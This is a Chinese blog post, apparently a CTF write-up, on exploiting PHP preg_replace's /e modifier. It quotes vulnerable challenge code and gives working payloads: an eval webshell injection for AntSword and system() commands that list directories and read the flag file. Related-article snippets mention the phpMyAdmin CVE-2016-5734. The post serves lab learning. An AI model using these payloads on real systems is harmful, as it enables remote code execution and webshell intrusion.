preg_replace函数漏洞利用

最新推荐文章于 2024-05-04 20:33:17 发布
最新推荐文章于 2024-05-04 20:33:17 发布
阅读量457 收藏 7
点赞数 4
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BoJing6/article/details/137094203
版权

首先看ctf不过如此那个题

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>
 

利用php伪协议来读取文件内容

解码得到这段源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}
?>

构造payload=?\S*=${@eval($_POST[cmd])}

url=http://dff6b40a-438c-4e37-b0f8-f426b517f042.node4.buuoj.cn:81/next.php?\S*=${@eval($_POST[cmd])}
密码cmd

\S* 是一个正则表达式模式,用于匹配零个或多个非空白字符。在URL中,\S* 将匹配任何非空白字符的序列。这里是大佬构造的 payload : \S*=${phpinfo()},链接在下面,然后用蚁剑连接即可

深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)

再看ics-05这题首先用php伪协议读取源码以后

利用preg_replace漏洞读取目录结构

playload:

​/index.php?pat=/abc/e&rep=system("cd%20s3chahahaDir%26%26%20ls")&sub=abc

%26就是&,%20就是空格,为什么用&&是因为&&是先执行前面语句为true后再执行后面的,就是先进入目录再ls,而&则被认为是两个独立的部分

/index.php?pat=/abc/e&rep=system("cd%20s3chahahaDir/flag%26%26%20ls")&sub=abc

/index.php?pat=/abc/e&rep=system("cat%20s3chahahaDir/flag/flag.php")&sub=abc

BoJing6
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PHP中一个有趣的preg_replace函数详解
12-20
事情的起因是下午遇到了 preg_replace 函数,我们都知道 preg_replace 函数可能会导致命令执行。现在我们来一些情况。 0x02 经过 踩坑1: 测试代码大概是这样的: foreach ($_GET as $regex => $value) { preg_...
php preg_replace漏洞,深入研究 preg_replace /e 模式下的代码漏洞问题
weixin_30097621的博客
03-10 363
摘要:本文将深入研究 preg_replace e 模式下的代码执行问题,其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析,当中的坑非常多,相信看完本文,你一定会有所收获。下面是 七月火 和 l1nk3r 的分析结果。 本文将深入研究preg_replace/e模式下的代码执行问题,其中包括preg_replace函数的执行过程分析、正则表达式...
php preg_replace漏洞,preg_replace引发的phpmyadmin(4.3.0-4.6.2)命令执行漏洞
weixin_30431137的博客
03-10 253
天融信阿尔法实验室 李喆这里拿cve-2016-5734讲讲preg_replace引发的命令执行漏洞漏洞在exploit-db上有利用脚本,经过测试没有问题。这里对这个漏洞进行一下回溯跟踪来解释下preg_replace这个正则替换函数带来的问题。0×01 漏洞触发原理preg_replace漏洞触发有两个前提:01:第一个参数需要e标识符,有了它可以执行第二个参数的命令02:第一个参数需要在...
php代码审计之preg_replace函数
giaogiao123的博客
11-08 5133
preg_replace:(PHP 5.5) 功能 : 函数执行一个正则表达式的搜索和替换 定义 : mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 看个例子 <?php preg_replace('/(.*)/ei', 'strtolower("\\1")', ${phpinfo()}); ?> ...
php preg_replace漏洞,php代码审计之preg_replace引发的phpmyadmin(4.3.0-4.6.2)命令执行漏洞...
weixin_35939140的博客
03-10 135
天融信阿尔法实验室 李喆这里拿cve-2016-5734讲讲preg_replace引发的命令执行漏洞漏洞在exploit-db上有利用脚本,经过测试没有问题。这里对这个漏洞进行一下回溯跟踪来解释下preg_replace这个正则替换函数带来的问题。0×01 漏洞触发原理preg_replace漏洞触发有两个前提:01:第一个参数需要e标识符,有了它可以执行第二个参数的命令02:第一个参数需要在...
PHP正则替换函数preg_replacepreg_replace_callback使用总结
12-18
在编写PHP模板引擎工具类时,以前常用的一个正则替换函数preg_replace(),加上正则修饰符 /e,就能够执行强大的回调函数,实现模板引擎编译(其实就是字符串替换)。 详情介绍参考博文:PHP函数preg_replace() ...
eregi_replace与preg_replace 函数代码的用法比较
10-30
eregi_replace与preg_replace 函数代码的用法比较
php中preg_replace_callback函数简单用法示例
12-19
函数的行为几乎和 preg_replace() 一样,除了不是提供一个 replacement 参数,而是指定一个 callback 函数。该函数将以目标字符串中的匹配数组作为输入参数,并返回用于替换的字符串。 例如问题: preg_replace($...
php中使用preg_replace函数匹配图片并加上链接的方法
10-27
preg_replace 执行正则表达式的搜索和替换,如果只是单纯的匹配字符串建议使用str_replace(),因为其执行效率高的多
【Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1397
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
php利用阿里云短信SDK实现短信发送功能
赛时科技
05-02 884
在阿里云控制台的AccessKey管理中,创建或查看AccessKey ID和AccessKey Secret,这是用于API调用的身份凭证。用户在前端接收到短信验证码后,需要在你的系统中进行验证。在实际部署之前,确保在测试环境中充分测试你的短信验证码登录功能。首先,你需要有一个阿里云账号,并在阿里云控制台中开通短信服务(Dysmsapi)。你可以使用Composer来安装阿里云短信服务的PHP SDK。在PHP中,你需要编写一个函数来调用阿里云短信服务API发送短信验证码。
安卓获取SHA
qq_36237165的博客
04-30 468
1、电脑上来存在eclipse的用户或正在使用此开发工具的用户就简单了,直接利用eclipse 走打包流程,再打包的时候选择相应的签名,那么在当前面板的下面便会出现签名的相关信息。3)确保安装了jdk并且正确配置了环境变量, 在该目录下打开cmd,输入命令 :keytool -printcert -file CERT.RSA。1) 将apk解压(1.可以直接用解压工具直接解压,如果不行就修改后缀为 .rar文件后),下面解压后的文件。便会出现响应的签名的信息了,如下图。然后输入相关的签名口令 回车。
展开说说:Android Fragment完全解析-卷三
Hidanchaofan的博客
05-03 728
本文章分析了Fragment的管理器FragmentManager、事务以及完整的声明周期和动态加载Fragment的原理解析。
翻译插件Translation和AndroidLocalize
qq_45649553的博客
04-28 457
翻译插件Translation和AndroidLocalize
安卓 app icon大小 安卓app界面尺寸大小
最新发布
s_sos0的博客
05-04 717
android app icon大小 android app界面尺寸大小
动手写一个简单的Android 表格控件支持固定列
WeiPR的博客
04-30 722
自己动手写一个支持固定列、滚动的简单易用Android表格控件
XYCTF 2024 WP
m0_64016126的博客
04-28 1166
首先访问robots.txt有一个l0g1in.txt,访问即可得到账号和密码BP抓包进行一系列伪造即可第一层payload:?第二层payload:GET:?POST:a[]=1这里主要是通过数组绕过preg_match,然后构造preg_replace/e 漏洞通过fastcoll生成两个md5值一样的图片即可。
php中的preg_replace函数,并举个例子
06-11
正则表达式是一种强大的字符串匹配工具,preg_replace函数可以使用正则表达式来进行字符串的替换操作。以下是一个使用preg_replace函数的例子: ```php $str = "Replace all the vowels in this string"; $pattern = "/[aeiou]/i"; $replacement = "*"; $new_str = preg_replace($pattern, $replacement, $str); echo $new_str; ``` 这个例子中,我们使用preg_replace函数将字符串中的所有元音字母替换为星号。首先我们定义了一个字符串$str,然后定义了一个正则表达式$pattern,它用于匹配所有的元音字母。接着,我们定义了一个$replacement字符串,用于替换匹配到的元音字母。最后,我们使用preg_replace函数将匹配到的元音字母替换为星号,并将结果存储在$new_str变量中。最终,我们使用echo函数输出$new_str的值,即替换后的字符串。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值